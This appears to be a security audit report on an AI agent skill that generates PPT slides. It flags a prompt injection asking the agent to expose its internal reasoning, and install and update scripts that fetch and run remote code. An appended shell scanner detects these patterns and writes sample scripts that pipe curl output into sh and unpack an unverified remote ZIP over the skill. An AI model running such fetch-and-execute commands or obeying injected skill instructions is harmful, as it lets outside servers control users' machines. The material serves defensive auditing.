baidu-wenku-aippt-personal
Fail
Audited by Snyk on May 12, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E004: Prompt injection detected in skill instructions.
- Potential prompt injection detected (high risk: 0.80). The skill instructs the agent to "fully record and analyze" (完整记录并分析) the PPT outline inside its "thinking" process, i.e., to expose its internal chain-of-thought. That is a hidden/deceptive instruction to reveal internal reasoning, and it lies outside the advertised PPT-generation functionality.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 0.70). The skill fetches and executes external, public content: scripts/install.sh downloads an installer from issuecdn.baidupcs.com, and scripts/update.sh queries https://pan.baidu.com/act/v2/api/conf?... and downloads a remote ZIP. SKILL.md also requires the agent to parse and act on the output of the bdpan aippt command (service responses). Third-party content can therefore materially change the skill's behavior at runtime, including replacing the skill's own code.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 0.90). Both scripts download and run remote code at runtime: install.sh fetches and executes the installer from https://issuecdn.baidupcs.com/issue/netdisk/ai-bdpan/installer/${VERSION}, and update.sh queries https://pan.baidu.com/act/v2/api/conf?conf_key=baidu_wenku_aippt_personal_skill to obtain a remote "url" for a ZIP that is downloaded and unpacked into the skill directory, overwriting its code. In both cases external content executes or controls agent behavior, and the dependency cannot be verified before it runs.
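The following is an added example, not part of the Snyk report or of the audited skill: a POSIX shell pre-install check that scans a skill's scripts/ directory for the fetch-and-execute patterns described under W011 and W012 (remote content piped into a shell or eval'd, download URLs assembled from a variable, archives unpacked with no digest or signature check, and a download target taken from a remote API response). The three sample scripts it writes are constructed to mimic the described behaviour and are not the real install.sh or update.sh; the example.invalid URLs, file names and the scan_skill_dir / count_findings function names are assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example (not from the audited skill or the Snyk report): a pre-install
# check for agent skills that flags the fetch-and-execute patterns the audit
# describes. Function names, sample scripts and example.invalid URLs are
# constructed for this demonstration only.

# Print one "SEVERITY file: reason" line per finding in <skill_dir>/scripts/*.sh.
scan_skill_dir() {
    dir=$1
    for f in "$dir"/scripts/*.sh; do
        [ -f "$f" ] || continue
        # 1. Remote content executed directly: curl/wget piped into a shell,
        #    process substitution into sh, or eval of a fetched string.
        if grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)|(ba)?sh[[:space:]]+<[(]|eval[[:space:]]+"?[$][(](curl|wget)' "$f"; then
            echo "HIGH $f: remote content executed directly (pipe-to-shell / eval)"
        fi
        # 2. Download URL assembled from a variable (e.g. .../installer/${VERSION}),
        #    so the fetched artifact is not pinned to a fixed, reviewable version.
        if grep -Eq 'https?://[^[:space:]"]*[$][{]?[A-Za-z_]' "$f"; then
            echo "MEDIUM $f: download URL built from a variable (unpinned artifact)"
        fi
        # 3. An archive is unpacked, but nothing in the script verifies a digest
        #    or signature before extraction.
        if grep -Eq '(^|[^[:alnum:]])(unzip|tar[[:space:]]+-?[a-zA-Z]*x)' "$f" \
           && ! grep -Eq 'sha256sum|shasum|gpg[[:space:]]+--verify|cosign' "$f"; then
            echo "MEDIUM $f: archive extracted without digest or signature check"
        fi
        # 4. The download target itself is parsed out of a remote API response,
        #    so the server decides at runtime which code the skill receives.
        if grep -Eq 'curl.*[|].*(jq|grep|sed).*url' "$f"; then
            echo "MEDIUM $f: download URL taken from a remote API response"
        fi
    done
}

# Number of findings for <skill_dir>; prints 0 when the scan is clean.
count_findings() {
    scan_skill_dir "$1" | grep -c . || true
}

# Constructed sample skill tree: two scripts reproducing the behaviours the
# report describes, plus one script that pins a release and verifies it.
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
mkdir -p "$SAMPLE_DIR/scripts"
cat > "$SAMPLE_DIR/scripts/install.sh" <<'EOF'
#!/bin/sh
VERSION=${1:-latest}
curl -fsSL "https://example.invalid/installer/${VERSION}" | sh
EOF
cat > "$SAMPLE_DIR/scripts/update.sh" <<'EOF'
#!/bin/sh
ZIP_URL=$(curl -fsSL "https://example.invalid/api/conf?conf_key=skill" | sed -n 's/.*"url":"\([^"]*\)".*/\1/p')
curl -fsSL -o /tmp/skill.zip "$ZIP_URL"
unzip -o /tmp/skill.zip -d "$(dirname "$0")/.."
EOF
cat > "$SAMPLE_DIR/scripts/safe.sh" <<'EOF'
#!/bin/sh
URL="https://example.invalid/releases/v1.2.3/skill.zip"
EXPECTED="<pinned sha256 of the reviewed release>"
curl -fsSL -o /tmp/skill.zip "$URL"
echo "$EXPECTED  /tmp/skill.zip" | sha256sum -c - || exit 1
unzip -o /tmp/skill.zip -d /tmp/skill
EOF

# install.sh and update.sh each produce two findings; safe.sh produces none.
scan_skill_dir "$SAMPLE_DIR"
echo "findings: $(count_findings "$SAMPLE_DIR")"
```

The rules are deliberately line-oriented greps rather than a shell parser, so they will miss obfuscated fetches (base64-decoded commands, URLs split across variables); treat a clean result as "nothing obvious", not as a verdict, and still read the scripts before installing a skill. A pinned URL plus a sha256sum check, as in the third sample, is what turns "unverifiable external dependency" into a reviewable one.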
Issues (3)
E004
CRITICAL: Prompt injection detected in skill instructions.
W011
MEDIUM: Third-party content exposure detected (indirect prompt injection risk).
W012
MEDIUM: Unverifiable external dependency detected (runtime URL that controls agent).
Audit Metadata